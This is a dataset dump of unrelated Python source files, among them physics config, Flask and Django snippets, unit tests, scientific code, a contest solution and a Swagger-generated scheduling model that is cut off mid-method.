process.ctfWithMaterialTracksP5TkCntFilter = cms.EDFilter("TrackCountFilter",
src = cms.InputTag('ctfWithMaterialTracksP5'),
minNumber = cms.uint32(1)
)
process.rsWithMaterialTracksP5TkCntFilter = cms.EDFilter("TrackCountFilter",
src = cms.InputTag('rsWithMaterialTracksP5'),
minNumber = cms.uint32(1)
)
process.cosmicMuonsBarrelOnlyTkFilter = cms.EDFilter("HLTMuonPointingFilter",
SALabel = cms.InputTag("cosmicMuonsBarrelOnly"),
PropagatorName = cms.string("SteppingHelixPropagatorAny"),
radius = cms.double(90.0),
maxZ = cms.double(130.0)
)
process.cosmicMuonsBarrelOnlyTkPath = cms.Path(process.cosmicMuonsBarrelOnlyTkFilter)
process.cosmictrackfinderP5TkCntPath = cms.Path(process.cosmictrackfinderP5TkCntFilter)
process.ctfWithMaterialTracksP5TkCntPath = cms.Path(process.ctfWithMaterialTracksP5TkCntFilter)
process.rsWithMaterialTracksP5TkCntPath = cms.Path(process.rsWithMaterialTracksP5TkCntFilter)
process.out = cms.OutputModule("PoolOutputModule",
outputCommands = cms.untracked.vstring('keep *','drop *_MEtoEDMConverter_*_*'),
SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('cosmicMuonsBarrelOnlyTkPath',
'cosmictrackfinderP5TkCntPath',
'ctfWithMaterialTracksP5TkCntPath',
'rsWithMaterialTracksP5TkCntPath')),
dataset = cms.untracked.PSet(
dataTier = cms.untracked.string('RAW-RECO'),
filterName = cms.untracked.string('TrackingPointing')),
fileName = cms.untracked.string('trackerPointing.root')
)
process.this_is_the_end = cms.EndPath(process.out)
| StarcoderdataPython |
4872744 | <reponame>manojkumar-github/DataStructures-DynamicProgramming-in-Python-JAVA-Cplusplus
#!/usr/bin.env python
# Copyright (C) Pearson Assessments - 2020. All Rights Reserved.
# Proprietary - Use with Pearson Written Permission Only
import flask
app = flask.Flask(__name__)
app.config["DEBUG"] = True
@app.route('/foo', methods=['GET'])
def sample():
return "a sample API"
app.run()
| StarcoderdataPython |
1802246 | <reponame>chndear/nanaimo<gh_stars>10-100
#
# Copyright 2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
# This software is distributed under the terms of the MIT License.
#
import argparse
import os
import typing
from unittest.mock import MagicMock
import pytest
import material
import nanaimo
import nanaimo.config
import nanaimo.connections
import nanaimo.connections.uart
import nanaimo.instruments.jlink
import nanaimo.parsers
import nanaimo.parsers.gtest
from nanaimo import set_subprocess_environment
@pytest.mark.timeout(10)
def test_uart_monitor(serial_simulator_type: typing.Type) -> None:
"""
Verify the nanaimo.ConcurrentUart class using a mock serial port.
"""
serial = serial_simulator_type(material.FAKE_TEST_SUCCESS)
last_line = material.FAKE_TEST_SUCCESS[-1]
with nanaimo.connections.uart.ConcurrentUart(serial) as monitor:
while True:
line = monitor.readline()
if line is None:
os.sched_yield()
continue
elif line == last_line:
break
@pytest.mark.asyncio
async def test_failed_test(serial_simulator_type: typing.Type) -> None:
serial = serial_simulator_type(material.FAKE_TEST_FAILURE)
with nanaimo.connections.uart.ConcurrentUart(serial) as monitor:
assert 1 == await nanaimo.parsers.gtest.Parser(10).read_test(monitor)
@pytest.mark.asyncio
async def test_timeout_while_monitoring(serial_simulator_type: typing.Type) -> None:
serial = serial_simulator_type(['gibberish'], loop_fake_data=False)
with nanaimo.connections.uart.ConcurrentUart(serial) as monitor:
assert 0 != await nanaimo.parsers.gtest.Parser(4.0).read_test(monitor)
def test_enable_default_from_environ(nanaimo_defaults: nanaimo.config.ArgumentDefaults) -> None:
a = nanaimo.Arguments(argparse.ArgumentParser(), nanaimo_defaults)
a.add_argument('yep', enable_default_from_environ=False)
with pytest.raises(ValueError):
a.add_argument('nope', enable_default_from_environ=True)
with pytest.raises(ValueError):
a.add_argument('-n', enable_default_from_environ=True)
a.add_argument('--yep', enable_default_from_environ=True)
with pytest.raises(RuntimeError):
a.add_argument('--yep', enable_default_from_environ=True)
@pytest.mark.parametrize('required_prefix,test_positional_args,test_expected_args',
[ # type: ignore
('tt', ['--foo-bar'], ['--tt-foo-bar']),
('z', ['-f', '--foo-bar'], ['-f', '--z-foo-bar']),
('pre', ['--foo-bar', '-x'], ['--pre-foo-bar', '-x']),
('a', ['-foo-bar', '-x'], ['-foo-bar', '-x'])
])
def test_require_prefix(required_prefix, test_positional_args, test_expected_args) -> None:
parser = MagicMock(spec=argparse.ArgumentParser)
parser.add_argument = MagicMock()
a = nanaimo.Arguments(parser, required_prefix=required_prefix)
a.add_argument(*test_positional_args)
parser.add_argument.assert_called_once_with(*test_expected_args)
def test_set_subprocess_environment_no_environ() -> None:
"""
Verify that no exceptions are thrown if the defaults config lacks an ``environ`` key.
"""
defaults = MagicMock(spec=nanaimo.config.ArgumentDefaults)
defaults.__getitem__ = MagicMock(side_effect=KeyError())
set_subprocess_environment(nanaimo.Namespace(defaults=defaults))
def test_get_as_merged_dict() -> None:
"""
Verify that no exceptions are thrown if the defaults config lacks an ``environ`` key
when using Namespace.get_as_merged_dict()
"""
defaults = MagicMock(spec=nanaimo.config.ArgumentDefaults)
defaults.__getitem__ = MagicMock(side_effect=KeyError())
nanaimo.Namespace(defaults=defaults).get_as_merged_dict('environ')
| StarcoderdataPython |
1984271 | <reponame>jensv/relative_canonical_helicity_tools
import numpy as np
from invert_curl.invert_curl import devore_invert_curl
from laplace_solver.laplace_solver import laplace_3d_dct_fd
import vector_calculus.vector_calculus as vc
def determine_reference_fields(mesh, circulation,
return_scalar_ref=False):
r"""
Return reference fields used for relative helicity.
Reference fields consist of a circulation and the general momentum vector
of which the curl gives the circulation.
Parameters
----------
mesh: list of ndarray
3D mesh
circulation: list of ndarray
3D vector which is the curl quantity.
e.g. magnetic field B or flow vorticity omega.
Returns
-------
momentum_ref: list of ndarray
reference general momentum field e.g.
reference magnetic vector potential or
reference flow
circulation_ref: list of ndarray
curl of reference field e.g.
reference magnetic field, reference flow vorticity.
Notes
-----
Circulation reference dotted with surface normal should be
the negative of the real circulation dotted with the surface
normal.
.. math::
$-\vec{Circ}_{ref} \cdot \hat{n}= \vec{Circ} \cdot \hat{n}$
"""
boundary = make_boundary(circulation)
scalar_potential_ref = laplace_3d_dct_fd(mesh, boundary)
circulation_ref = vc.gradient(scalar_potential_ref, mesh=mesh)
momentum_ref = devore_invert_curl(mesh,
circulation_ref)
if return_scalar_ref:
return momentum_ref, circulation_ref, scalar_potential_ref
else:
return momentum_ref, circulation_ref
def make_boundary(field):
r"""
Return boundary conditions for circulation reference.
.. math::
$-\vec{Circ}_{ref} \cdot \hat{n}= \vec{Circ} \cdot \hat{n}$
"""
boundary = np.zeros(field[0].shape)
boundary[:, 0, :] = -field[0][:, 0, :]
boundary[:, -1, :] = -field[0][:, -1, :]
boundary[0, :, :] = -field[1][0, :, :]
boundary[-1, :, :] = -field[1][-1, :, :]
boundary[:, :, 0] = -field[2][:, :, 0]
boundary[:, :, -1] = -field[2][:, :, -1]
return boundary
| StarcoderdataPython |
3345947 | from django.conf.urls import patterns, include, url
from django.contrib.auth.decorators import login_required
from django.contrib.admin.views.decorators import staff_member_required
from issues.views import *
urlpatterns = patterns("issues.views",
(r"^delete-comment/(\d+)/$", "delete_comment", {}, "delete_comment"),
(r"^update-issue/(\d+)/(delete)/$", "update_issue", {}, "update_issue"),
(r"^update-issue/(\d+)/(closed|progress)/(on|off|\d+)/$", "update_issue", {}, "update_issue"),
(r"^update-issue-detail/(?P<mfpk>\d+)/$", staff_member_required(UpdateIssue.as_view()), {}, "update_issue_detail"),
(r"^reports/$", staff_member_required(ReportList.as_view()), {}, "reports"),
(r"^create-issue/$", staff_member_required(CreateIssue.as_view()), {}, "create_issue"),
(r"^create-report/$", staff_member_required(CreateReport.as_view()), {}, "create_report"),
(r"^update-report/(?P<mfpk>\d+)/$", staff_member_required(UpdateReport.as_view()), {}, "update_report"),
(r"^duplicate-report/(?P<dpk>\d+)/$", staff_member_required(DuplicateReport.as_view()), {}, "duplicate_report"),
(r"^issue/(?P<dpk>\d+)/$", staff_member_required(ViewIssue.as_view()), {}, "issue"),
(r"^attachments/(?P<dpk>\d+)/$", staff_member_required(AttachmentsView.as_view()), {}, "attachments"),
# (r"^attachments/(?P<dpk>\d+)/$", staff_member_required(attachments_view), {}, "attachments"),
(r"^update-comment/(?P<mfpk>\d+)/$", staff_member_required(UpdateComment.as_view()), {}, "update_comment"),
(r"^add-issues/$", staff_member_required(AddIssues.as_view()), {}, "add_issues"),
(r"^report/(?P<dpk>\d+)/$", staff_member_required(ReportView.as_view()), {}, "report"),
)
| StarcoderdataPython |
4800958 | <gh_stars>1-10
#!/usr/bin/env python
# -*- coding=utf-8 -*-
from __future__ import print_function
# from __future__ import absolute_import
import os
import sys
if not os.path.abspath("../") in sys.path:
sys.path.append(os.path.abspath("../"))
try:
from unittest import mock
except ImportError:
import mock
import unittest
import numpy as np
import tensorflow as tf
from utils.utils import make_unique_section_file
from utils.utils import get_padding_num
from utils.utils import timer_wrapper
from yolo.yolo_utils import select_boxes_by_classes_prob
from yolo.yolo_utils import non_max_suppression
from yolo.yolo_utils import read_classes_names
class TestUtiils(unittest.TestCase):
# def test_get_padding_num_one_dim(self):
# input_shape = [10,13]
# kernel_size = [3,3]
# stride = 2
# self.assertTrue(
# (get_padding_num(input_shape, kernel_size, stride) == \
# np.array([[1., 2.], [1., 2.]])).all())
def test_timer_wrapper(self):
@timer_wrapper
def func():
for i in range(1000):
x = i * i
func()
class TestYOLOUtils(unittest.TestCase):
# def test_select_boxes_by_classes_prob(self):
# box_confidences = tf.random_normal([3,3,2])
# class_probs = tf.random_normal([3,3,5])
# boxes = tf.random_normal([3,3,2,4])
# print(select_boxes_by_classes_prob(box_confidences, class_probs, boxes))
# def test_non_max_suppression(self):
# box_confidences = tf.random_normal([3,3,2])
# class_probs = tf.random_normal([3,3,5])
# boxes = tf.random_normal([3,3,2,4])
# class_scores,boxes,classes = select_boxes_by_classes_prob(box_confidences, class_probs, boxes)
# print(non_max_suppression(class_scores, boxes, classes))
def test_read_classes_names_voc(self):
file_path = '../data/voc.names'
names = read_classes_names(file_path)
self.assertEqual(
['aeroplane', 'bicycle', 'bird', 'boat', 'bottle', 'bus', 'car', 'cat', 'chair', 'cow', 'diningtable', 'dog', 'horse', 'motorbike', 'person', 'pottedplant', 'sheep', 'sofa', 'train', 'tvmonitor'],
names)
if "__main__" == __name__:
unittest.main() | StarcoderdataPython |
4943269 | <reponame>fBloc/bloc-client-python<filename>bloc_py_tryout/math_calcu_test.py<gh_stars>0
import unittest
from bloc_client import *
from bloc_py_tryout.math_calcu import MathCalcu
class TestMathCalcuNode(unittest.TestCase):
def setUp(self):
self.client = BlocClient.new_client("")
def test_add(self):
opt = self.client.test_run_function(
MathCalcu(),
[
[ # ipt 0
[1, 2] # component 0, numbers
],
[ # ipt 1
1 # "+" operater
],
]
)
assert isinstance(opt, FunctionRunOpt), "opt should be FunctionRunOpt type"
self.assertIsInstance(opt, FunctionRunOpt, "opt is not FunctionRunOpt type")
self.assertTrue(opt.suc, "should suc")
self.assertFalse(opt.intercept_below_function_run, "should not intercept below function run")
self.assertEqual(opt.optKey_map_data['result'], 3, "result should be 3")
if __name__ == '__main__':
unittest.main()
| StarcoderdataPython |
9773420 | from errors import CustomListSumException
from tests.customlist_tests.base.customlist_test_base import CustomListTestBase
class CustomListSumTests(CustomListTestBase):
def test_customListSum_whenEmptyList_shouldReturn0(self):
custom_list = self.setup_list()
result = custom_list.sum()
self.assertEqual(0, result)
def test_customListSum_whenMultipleNumbers_shouldReturnTheirSum(self):
custom_list = self.setup_list(1, 2)
result = custom_list.sum()
self.assertEqual(3, result)
def test_customListSum_whenNumbersAndLenObjects_shouldReturnTheirSum(self):
custom_list = self.setup_list(1, 2, '123')
result = custom_list.sum()
self.assertEqual(6, result)
def test_customListSum_whenInvalidObjects_shouldRaise(self):
custom_list = self.setup_list(1, 2, '123', object())
with self.assertRaises(CustomListSumException) as context:
custom_list.sum()
self.assertIsNotNone(context.exception)
| StarcoderdataPython |
9749158 | <reponame>billyio/atcoder<gh_stars>1-10
# https://drken1215.hatenablog.com/entry/2020/10/11/211000
N = int(input())
if N == 1:
print(0)
exit()
dp = [0 for _ in range(N+1)]
dp[0], dp[1], dp[2] = 1, 0, 0
for i in range(2,N+1):
for j in range(0,i-2):
dp[i] += dp[j]
print(dp[-1] % (10**9+7)) | StarcoderdataPython |
301948 | <filename>src/ctc/db/schemas/contract_abis/contract_abis_statements.py
from __future__ import annotations
import json
import typing
import toolsql
from ctc import spec
from ... import schema_utils
async def async_upsert_contract_abi(
address: spec.Address,
abi: spec.ContractABI,
includes_proxy: bool,
conn: toolsql.SAConnection,
network: spec.NetworkReference | None = None,
) -> None:
abi_text = json.dumps(abi)
table = schema_utils.get_table_name(
'contract_abis', network=network
)
toolsql.insert(
conn=conn,
table=table,
row={
'address': address.lower(),
'abi_text': abi_text,
'includes_proxy': includes_proxy,
},
upsert='do_update',
)
async def async_select_contract_abi(
address: spec.Address,
network: spec.NetworkReference | None = None,
*,
conn: toolsql.SAConnection,
) -> spec.ContractABI | None:
table = schema_utils.get_table_name(
'contract_abis',
network=network,
)
abi_text = toolsql.select(
conn=conn,
table=table,
row_id=address.lower(),
return_count='one',
only_columns=['abi_text'],
row_format='only_column',
)
if abi_text is not None:
return json.loads(abi_text)
else:
return None
async def async_select_contract_abis(
network: spec.NetworkReference | None = None,
*,
conn: toolsql.SAConnection,
) -> typing.Mapping[spec.Address, spec.ContractABI]:
table = schema_utils.get_table_name(
'contract_abis',
network=network,
)
results = toolsql.select(
conn=conn,
table=table,
)
return {
result['address']: json.loads(result['abi_text'])
for result in results
}
async def async_delete_contract_abi(
conn: toolsql.SAConnection,
address: spec.Address,
network: spec.NetworkReference | None = None,
) -> None:
table = schema_utils.get_table_name(
'contract_abis',
network=network,
)
toolsql.delete(
conn=conn,
table=table,
row_id=address.lower(),
)
| StarcoderdataPython |
8116274 | # coding: utf-8
"""
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
import re
import json
from ..utils import sanitize_for_serialization
class WorkPlanShift(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
def __init__(self):
"""
WorkPlanShift - a model defined in Swagger
:param dict swaggerTypes: The key is attribute name
and the value is attribute type.
:param dict attributeMap: The key is attribute name
and the value is json key in definition.
"""
self.swagger_types = {
'name': 'str',
'days': 'SetWrapperDayOfWeek',
'flexible_start_time': 'bool',
'exact_start_time_minutes_from_midnight': 'int',
'earliest_start_time_minutes_from_midnight': 'int',
'latest_start_time_minutes_from_midnight': 'int',
'constrain_stop_time': 'bool',
'constrain_latest_stop_time': 'bool',
'latest_stop_time_minutes_from_midnight': 'int',
'constrain_earliest_stop_time': 'bool',
'earliest_stop_time_minutes_from_midnight': 'int',
'start_increment_minutes': 'int',
'flexible_paid_time': 'bool',
'exact_paid_time_minutes': 'int',
'minimum_paid_time_minutes': 'int',
'maximum_paid_time_minutes': 'int',
'constrain_contiguous_work_time': 'bool',
'minimum_contiguous_work_time_minutes': 'int',
'maximum_contiguous_work_time_minutes': 'int',
'activities': 'list[WorkPlanActivity]',
'id': 'str',
'delete': 'bool'
}
self.attribute_map = {
'name': 'name',
'days': 'days',
'flexible_start_time': 'flexibleStartTime',
'exact_start_time_minutes_from_midnight': 'exactStartTimeMinutesFromMidnight',
'earliest_start_time_minutes_from_midnight': 'earliestStartTimeMinutesFromMidnight',
'latest_start_time_minutes_from_midnight': 'latestStartTimeMinutesFromMidnight',
'constrain_stop_time': 'constrainStopTime',
'constrain_latest_stop_time': 'constrainLatestStopTime',
'latest_stop_time_minutes_from_midnight': 'latestStopTimeMinutesFromMidnight',
'constrain_earliest_stop_time': 'constrainEarliestStopTime',
'earliest_stop_time_minutes_from_midnight': 'earliestStopTimeMinutesFromMidnight',
'start_increment_minutes': 'startIncrementMinutes',
'flexible_paid_time': 'flexiblePaidTime',
'exact_paid_time_minutes': 'exactPaidTimeMinutes',
'minimum_paid_time_minutes': 'minimumPaidTimeMinutes',
'maximum_paid_time_minutes': 'maximumPaidTimeMinutes',
'constrain_contiguous_work_time': 'constrainContiguousWorkTime',
'minimum_contiguous_work_time_minutes': 'minimumContiguousWorkTimeMinutes',
'maximum_contiguous_work_time_minutes': 'maximumContiguousWorkTimeMinutes',
'activities': 'activities',
'id': 'id',
'delete': 'delete'
}
self._name = None
self._days = None
self._flexible_start_time = None
self._exact_start_time_minutes_from_midnight = None
self._earliest_start_time_minutes_from_midnight = None
self._latest_start_time_minutes_from_midnight = None
self._constrain_stop_time = None
self._constrain_latest_stop_time = None
self._latest_stop_time_minutes_from_midnight = None
self._constrain_earliest_stop_time = None
self._earliest_stop_time_minutes_from_midnight = None
self._start_increment_minutes = None
self._flexible_paid_time = None
self._exact_paid_time_minutes = None
self._minimum_paid_time_minutes = None
self._maximum_paid_time_minutes = None
self._constrain_contiguous_work_time = None
self._minimum_contiguous_work_time_minutes = None
self._maximum_contiguous_work_time_minutes = None
self._activities = None
self._id = None
self._delete = None
@property
def name(self):
"""
Gets the name of this WorkPlanShift.
Name of the shift
:return: The name of this WorkPlanShift.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this WorkPlanShift.
Name of the shift
:param name: The name of this WorkPlanShift.
:type: str
"""
self._name = name
@property
def days(self):
"""
Gets the days of this WorkPlanShift.
Days of the week applicable for this shift
:return: The days of this WorkPlanShift.
:rtype: SetWrapperDayOfWeek
"""
return self._days
@days.setter
def days(self, days):
"""
Sets the days of this WorkPlanShift.
Days of the week applicable for this shift
:param days: The days of this WorkPlanShift.
:type: SetWrapperDayOfWeek
"""
self._days = days
@property
def flexible_start_time(self):
"""
Gets the flexible_start_time of this WorkPlanShift.
Whether the start time of the shift is flexible
:return: The flexible_start_time of this WorkPlanShift.
:rtype: bool
"""
return self._flexible_start_time
@flexible_start_time.setter
def flexible_start_time(self, flexible_start_time):
"""
Sets the flexible_start_time of this WorkPlanShift.
Whether the start time of the shift is flexible
:param flexible_start_time: The flexible_start_time of this WorkPlanShift.
:type: bool
"""
self._flexible_start_time = flexible_start_time
@property
def exact_start_time_minutes_from_midnight(self):
"""
Gets the exact_start_time_minutes_from_midnight of this WorkPlanShift.
Exact start time of the shift defined as offset minutes from midnight. Used if flexibleStartTime == false
:return: The exact_start_time_minutes_from_midnight of this WorkPlanShift.
:rtype: int
"""
return self._exact_start_time_minutes_from_midnight
@exact_start_time_minutes_from_midnight.setter
def exact_start_time_minutes_from_midnight(self, exact_start_time_minutes_from_midnight):
"""
Sets the exact_start_time_minutes_from_midnight of this WorkPlanShift.
Exact start time of the shift defined as offset minutes from midnight. Used if flexibleStartTime == false
:param exact_start_time_minutes_from_midnight: The exact_start_time_minutes_from_midnight of this WorkPlanShift.
:type: int
"""
self._exact_start_time_minutes_from_midnight = exact_start_time_minutes_from_midnight
@property
def earliest_start_time_minutes_from_midnight(self):
"""
Gets the earliest_start_time_minutes_from_midnight of this WorkPlanShift.
Earliest start time of the shift defined as offset minutes from midnight. Used if flexibleStartTime == true
:return: The earliest_start_time_minutes_from_midnight of this WorkPlanShift.
:rtype: int
"""
return self._earliest_start_time_minutes_from_midnight
@earliest_start_time_minutes_from_midnight.setter
def earliest_start_time_minutes_from_midnight(self, earliest_start_time_minutes_from_midnight):
"""
Sets the earliest_start_time_minutes_from_midnight of this WorkPlanShift.
Earliest start time of the shift defined as offset minutes from midnight. Used if flexibleStartTime == true
:param earliest_start_time_minutes_from_midnight: The earliest_start_time_minutes_from_midnight of this WorkPlanShift.
:type: int
"""
self._earliest_start_time_minutes_from_midnight = earliest_start_time_minutes_from_midnight
@property
def latest_start_time_minutes_from_midnight(self):
"""
Gets the latest_start_time_minutes_from_midnight of this WorkPlanShift.
Latest start time of the shift defined as offset minutes from midnight. Used if flexibleStartTime == true
:return: The latest_start_time_minutes_from_midnight of this WorkPlanShift.
:rtype: int
"""
return self._latest_start_time_minutes_from_midnight
@latest_start_time_minutes_from_midnight.setter
def latest_start_time_minutes_from_midnight(self, latest_start_time_minutes_from_midnight):
"""
Sets the latest_start_time_minutes_from_midnight of this WorkPlanShift.
Latest start time of the shift defined as offset minutes from midnight. Used if flexibleStartTime == true
:param latest_start_time_minutes_from_midnight: The latest_start_time_minutes_from_midnight of this WorkPlanShift.
:type: int
"""
self._latest_start_time_minutes_from_midnight = latest_start_time_minutes_from_midnight
@property
def constrain_stop_time(self):
"""
Gets the constrain_stop_time of this WorkPlanShift.
Whether the latest stop time constraint for the shift is enabled. Deprecated, use constrainLatestStopTime instead
:return: The constrain_stop_time of this WorkPlanShift.
:rtype: bool
"""
return self._constrain_stop_time
@constrain_stop_time.setter
def constrain_stop_time(self, constrain_stop_time):
"""
Sets the constrain_stop_time of this WorkPlanShift.
Whether the latest stop time constraint for the shift is enabled. Deprecated, use constrainLatestStopTime instead
:param constrain_stop_time: The constrain_stop_time of this WorkPlanShift.
:type: bool
"""
self._constrain_stop_time = constrain_stop_time
@property
def constrain_latest_stop_time(self):
"""
Gets the constrain_latest_stop_time of this WorkPlanShift.
Whether the latest stop time constraint for the shift is enabled
:return: The constrain_latest_stop_time of this WorkPlanShift.
:rtype: bool
"""
return self._constrain_latest_stop_time
@constrain_latest_stop_time.setter
def constrain_latest_stop_time(self, constrain_latest_stop_time):
"""
Sets the constrain_latest_stop_time of this WorkPlanShift.
Whether the latest stop time constraint for the shift is enabled
:param constrain_latest_stop_time: The constrain_latest_stop_time of this WorkPlanShift.
:type: bool
"""
self._constrain_latest_stop_time = constrain_latest_stop_time
@property
def latest_stop_time_minutes_from_midnight(self):
"""
Gets the latest_stop_time_minutes_from_midnight of this WorkPlanShift.
Latest stop time of the shift defined as offset minutes from midnight. Used if constrainStopTime == true
:return: The latest_stop_time_minutes_from_midnight of this WorkPlanShift.
:rtype: int
"""
return self._latest_stop_time_minutes_from_midnight
@latest_stop_time_minutes_from_midnight.setter
def latest_stop_time_minutes_from_midnight(self, latest_stop_time_minutes_from_midnight):
"""
Sets the latest_stop_time_minutes_from_midnight of this WorkPlanShift.
Latest stop time of the shift defined as offset minutes from midnight. Used if constrainStopTime == true
:param latest_stop_time_minutes_from_midnight: The latest_stop_time_minutes_from_midnight of this WorkPlanShift.
:type: int
"""
self._latest_stop_time_minutes_from_midnight = latest_stop_time_minutes_from_midnight
@property
def constrain_earliest_stop_time(self):
"""
Gets the constrain_earliest_stop_time of this WorkPlanShift.
Whether the earliest stop time constraint for the shift is enabled
:return: The constrain_earliest_stop_time of this WorkPlanShift.
:rtype: bool
"""
return self._constrain_earliest_stop_time
@constrain_earliest_stop_time.setter
def constrain_earliest_stop_time(self, constrain_earliest_stop_time):
"""
Sets the constrain_earliest_stop_time of this WorkPlanShift.
Whether the earliest stop time constraint for the shift is enabled
:param constrain_earliest_stop_time: The constrain_earliest_stop_time of this WorkPlanShift.
:type: bool
"""
self._constrain_earliest_stop_time = constrain_earliest_stop_time
@property
def earliest_stop_time_minutes_from_midnight(self):
"""
Gets the earliest_stop_time_minutes_from_midnight of this WorkPlanShift.
This is the earliest time a shift can end
:return: The earliest_stop_time_minutes_from_midnight of this WorkPlanShift.
:rtype: int
"""
return self._earliest_stop_time_minutes_from_midnight
@earliest_stop_time_minutes_from_midnight.setter
def earliest_stop_time_minutes_from_midnight(self, earliest_stop_time_minutes_from_midnight):
"""
Sets the earliest_stop_time_minutes_from_midnight of this WorkPlanShift.
This is the earliest time a shift can end
:param earliest_stop_time_minutes_from_midnight: The earliest_stop_time_minutes_from_midnight of this WorkPlanShift.
:type: int
"""
self._earliest_stop_time_minutes_from_midnight = earliest_stop_time_minutes_from_midnight
@property
def start_increment_minutes(self):
"""
Gets the start_increment_minutes of this WorkPlanShift.
Increment in offset minutes that would contribute to different possible start times for the shift. Used if flexibleStartTime == true
:return: The start_increment_minutes of this WorkPlanShift.
:rtype: int
"""
return self._start_increment_minutes
@start_increment_minutes.setter
def start_increment_minutes(self, start_increment_minutes):
"""
Sets the start_increment_minutes of this WorkPlanShift.
Increment in offset minutes that would contribute to different possible start times for the shift. Used if flexibleStartTime == true
:param start_increment_minutes: The start_increment_minutes of this WorkPlanShift.
:type: int
"""
self._start_increment_minutes = start_increment_minutes
@property
def flexible_paid_time(self):
"""
Gets the flexible_paid_time of this WorkPlanShift.
Whether the paid time setting for the shift is flexible
:return: The flexible_paid_time of this WorkPlanShift.
:rtype: bool
"""
return self._flexible_paid_time
@flexible_paid_time.setter
def flexible_paid_time(self, flexible_paid_time):
"""
Sets the flexible_paid_time of this WorkPlanShift.
Whether the paid time setting for the shift is flexible
:param flexible_paid_time: The flexible_paid_time of this WorkPlanShift.
:type: bool
"""
self._flexible_paid_time = flexible_paid_time
@property
def exact_paid_time_minutes(self):
"""
Gets the exact_paid_time_minutes of this WorkPlanShift.
Exact paid time in minutes configured for the shift. Used if flexiblePaidTime == false
:return: The exact_paid_time_minutes of this WorkPlanShift.
:rtype: int
"""
return self._exact_paid_time_minutes
@exact_paid_time_minutes.setter
def exact_paid_time_minutes(self, exact_paid_time_minutes):
"""
Sets the exact_paid_time_minutes of this WorkPlanShift.
Exact paid time in minutes configured for the shift. Used if flexiblePaidTime == false
:param exact_paid_time_minutes: The exact_paid_time_minutes of this WorkPlanShift.
:type: int
"""
self._exact_paid_time_minutes = exact_paid_time_minutes
@property
def minimum_paid_time_minutes(self):
"""
Gets the minimum_paid_time_minutes of this WorkPlanShift.
Minimum paid time in minutes configured for the shift. Used if flexiblePaidTime == true
:return: The minimum_paid_time_minutes of this WorkPlanShift.
:rtype: int
"""
return self._minimum_paid_time_minutes
@minimum_paid_time_minutes.setter
def minimum_paid_time_minutes(self, minimum_paid_time_minutes):
"""
Sets the minimum_paid_time_minutes of this WorkPlanShift.
Minimum paid time in minutes configured for the shift. Used if flexiblePaidTime == true
:param minimum_paid_time_minutes: The minimum_paid_time_minutes of this WorkPlanShift.
:type: int
"""
self._minimum_paid_time_minutes = minimum_paid_time_minutes
@property
def maximum_paid_time_minutes(self):
"""
Gets the maximum_paid_time_minutes of this WorkPlanShift.
Maximum paid time in minutes configured for the shift. Used if flexiblePaidTime == true
:return: The maximum_paid_time_minutes of this WorkPlanShift.
:rtype: int
"""
return self._maximum_paid_time_minutes
@maximum_paid_time_minutes.setter
def maximum_paid_time_minutes(self, maximum_paid_time_minutes):
"""
Sets the maximum_paid_time_minutes of this WorkPlanShift.
Maximum paid time in minutes configured for the shift. Used if flexiblePaidTime == true
:param maximum_paid_time_minutes: The maximum_paid_time_minutes of this WorkPlanShift.
:type: int
"""
self._maximum_paid_time_minutes = maximum_paid_time_minutes
@property
def constrain_contiguous_work_time(self):
"""
Gets the constrain_contiguous_work_time of this WorkPlanShift.
Whether the contiguous time constraint for the shift is enabled
:return: The constrain_contiguous_work_time of this WorkPlanShift.
:rtype: bool
"""
return self._constrain_contiguous_work_time
@constrain_contiguous_work_time.setter
def constrain_contiguous_work_time(self, constrain_contiguous_work_time):
"""
Sets the constrain_contiguous_work_time of this WorkPlanShift.
Whether the contiguous time constraint for the shift is enabled
:param constrain_contiguous_work_time: The constrain_contiguous_work_time of this WorkPlanShift.
:type: bool
"""
self._constrain_contiguous_work_time = constrain_contiguous_work_time
@property
def minimum_contiguous_work_time_minutes(self):
"""
Gets the minimum_contiguous_work_time_minutes of this WorkPlanShift.
Minimum contiguous time in minutes configured for the shift. Used if constrainContiguousWorkTime == true
:return: The minimum_contiguous_work_time_minutes of this WorkPlanShift.
:rtype: int
"""
return self._minimum_contiguous_work_time_minutes
@minimum_contiguous_work_time_minutes.setter
def minimum_contiguous_work_time_minutes(self, minimum_contiguous_work_time_minutes):
"""
Sets the minimum_contiguous_work_time_minutes of this WorkPlanShift.
Minimum contiguous time in minutes configured for the shift. Used if constrainContiguousWorkTime == true
:param minimum_contiguous_work_time_minutes: The minimum_contiguous_work_time_minutes of this WorkPlanShift.
:type: int
"""
self._minimum_contiguous_work_time_minutes = minimum_contiguous_work_time_minutes
@property
def maximum_contiguous_work_time_minutes(self):
"""
Gets the maximum_contiguous_work_time_minutes of this WorkPlanShift.
Maximum contiguous time in minutes configured for the shift. Used if constrainContiguousWorkTime == true
:return: The maximum_contiguous_work_time_minutes of this WorkPlanShift.
:rtype: int
"""
return self._maximum_contiguous_work_time_minutes
@maximum_contiguous_work_time_minutes.setter
def maximum_contiguous_work_time_minutes(self, maximum_contiguous_work_time_minutes):
"""
Sets the maximum_contiguous_work_time_minutes of this WorkPlanShift.
Maximum contiguous time in minutes configured for the shift. Used if constrainContiguousWorkTime == true
:param maximum_contiguous_work_time_minutes: The maximum_contiguous_work_time_minutes of this WorkPlanShift.
:type: int
"""
self._maximum_contiguous_work_time_minutes = maximum_contiguous_work_time_minutes
@property
def activities(self):
"""
Gets the activities of this WorkPlanShift.
Activities configured for this shift
:return: The activities of this WorkPlanShift.
:rtype: list[WorkPlanActivity]
"""
return self._activities
@activities.setter
def activities(self, activities):
"""
Sets the activities of this WorkPlanShift.
Activities configured for this shift
:param activities: The activities of this WorkPlanShift.
:type: list[WorkPlanActivity]
"""
self._activities = activities
@property
def id(self):
"""
Gets the id of this WorkPlanShift.
ID of the shift. This is required only for the case of updating an existing shift
:return: The id of this WorkPlanShift.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""
